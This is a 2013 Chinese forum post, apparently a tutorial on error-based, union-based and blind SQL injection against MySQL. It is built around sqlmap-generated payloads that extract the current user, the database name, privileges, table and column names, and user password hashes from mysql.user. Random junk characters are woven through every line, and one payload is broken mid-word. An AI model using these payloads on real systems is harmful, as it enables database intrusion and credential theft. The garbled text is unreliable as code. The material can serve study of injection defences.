放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。% q& \( i. G" U) @
) x3 \ Z& c3 W' ~5 ]: a3 A. g这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表& G$ r' l$ o# ^& w& ?0 \
5 E a) I/ k: ^5 V8 p6 q4 C
分类标准 分类 备注
: z8 a6 r+ L- a$ D$ G- `3 F; W按字段类型 整型注入,字符型注入 & K! T P* Z6 v6 q+ t0 n' Y3 s: d
按出现的位置 get注入,post注入,cookie注入,http header注入
% t6 L T, M& H( Y然而高级注入是这样的* }2 |& [& q1 j9 ]
. i: g$ e3 C8 ^+ _- x8 h$ v+ [; X高级注入分类 条件5 w H; N5 s5 o2 C2 C" L
error-based sql 数据库的错误回显可以返回,存在数据库,表结构
+ G. C8 P3 z6 r& |union-based sql 能够使用union,存在数据库,表结构
3 o5 Y. N4 K1 w/ e8 Iblind sql 存在注入! S6 U$ h) Q8 i+ a
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。! G1 Q* g' g0 Z( _1 ^$ y) H% y
, Z8 [6 G9 g* }" `+ S4 a- Y
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火: H: x! Q* ~" B# [- E: Z% D
1 S' F c% x- M5 r附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
. a# O& N4 p2 i' a3 c" l* @# E3 L1 Y
4 f! H6 h9 ^6 Z4 @* i, _9 H这里用mysql说明! Y, U W9 U7 y3 Y
4 x" w- O- [. xe注入坛子里很多了,请看戳我或者再戳我
' X, m8 l' k: b4 Y- g7 b
6 | Q2 f. F+ r- w$ Ku注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
9 Z# k: r9 ], m
% E/ p+ Z+ P0 I% K# K0 o获取当前数据库用户名5 Y- |$ M W. U
6 x) g* y1 J6 _$ O" O4 G! sUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C' v! e T% q& s9 t5 p# E
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL. x) Z* g1 x$ _3 B/ l6 k$ f6 n
L, NULL#, W4 M4 l/ C" u0 I/ o5 F& ~
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
8 _ F- R! y+ h" `+ \8 A
3 h$ s( R1 ?- I& I0 y9 y6 o获取数据库名# w7 Y1 p+ Z* ]2 F! v
! E1 j4 ]; V S$ y3 @8 |
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
7 e' L" @% N9 E' ^: J2 w, K获取所有用户名& o+ i+ q7 [' F; o1 O/ [8 f
6 W' R9 }% j( O
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#3 e5 h" i. w8 e& M' |0 L
查看当前用户权限
/ ]: a8 n* L: N- Z; W0 T
* X: j* w' w% H% tUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
1 D/ k9 o# Z# p# z9 G$ ?尝试获取密码,当然需要有能读mysql数据库的权限
! }7 t% X$ s% ~0 Z5 |% v+ F/ y, U
! t3 v$ x9 O8 T' B' g/ ~2 fUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#! D% T. [4 T! d0 l$ s* K
获取表名,limit什么的自己搞啦
- w# A4 ~2 m7 h4 [1 T) L
1 i4 [- |! |9 E; e$ v# a& vUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#$ x- D6 y4 L* V
获取字段名及其类型; n8 @4 l, _. F; }" j J8 l: o
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
3 L% V( Z6 u% ^* h . ~( }- V! y& P: u1 @1 D; U( _0 }& T' B
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。# O% A2 e' e1 l9 R2 m+ `( y
! o' F( C3 b+ U) r, A8 B如:
0 {4 Q( W% {: Q7 T获取当前用户名
& }9 R- Y- j' o1 }0 j( j
/ Q$ N/ D% u3 V5 nAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116$ [+ s9 E9 p* F# x" f* ~6 D. F% g- B
获取当前数据库$ G3 y e- Z; f4 U
* E1 S4 ]% R$ e" C; K8 d% aAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
+ q: W7 G% \ v+ t2 N' c, ~获取表名
6 y# x0 c$ x% ]+ a5 E
! O. v9 T+ |; W$ Y F( O3 [( cAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
$ E7 M; ^7 l# P" ?5 h* q; j& Z2 x获取字段名及其类型和爆内容就不说了,改改上面的就可以了。. G3 o- i/ M* @% [: \
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
( \" B4 z3 O' \+ P$ Z) ]1 F1 T爆表
3 E1 f9 ?$ {+ ^
: |3 c4 @. {) w3 R l' ]5 eAND EXISTS(select * from table)
. o' F5 c5 A" @7 Q) l爆字段9 @) d6 p/ j/ `' `6 p0 X2 ?
5 B7 e8 H7 ^9 T$ N+ B- v* N
AND EXISTS(select pwd from table)
1 W$ L6 {* W4 i( L2 S- s盲注的变化就比较多了,由于篇幅,只是举个例子而已。
5 U- D' t8 F, e% e) i
+ C) U' @/ e# T/ p0 S本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。3 s: y4 A8 F% s3 K
|
发表于 2013-7-16 20:31:26
收藏
支持
反对